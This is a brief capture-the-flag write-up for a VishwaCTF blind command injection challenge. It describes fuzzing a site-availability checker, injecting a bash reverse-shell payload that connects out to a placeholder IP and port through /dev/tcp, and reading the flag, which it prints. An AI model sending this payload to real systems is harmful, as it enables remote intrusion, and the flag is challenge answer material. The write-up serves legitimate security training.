1. On the site we can check whether the site is accessible or not.
2. After phasing, I noticed that the site has a strange effect on payloads (ls, pwd, etc.)
3. After some machinations I came to the conclusion that the site has the Blind CMD Injection vulnerability.
4. Send the following payload: bash -c "bash -l > /dev/tcp/IP/PORT 0<&1 2>&1".
5. Receive the reverse shell and read the flag.
Flag: VishwaCTF{b1inD_cmd-i}.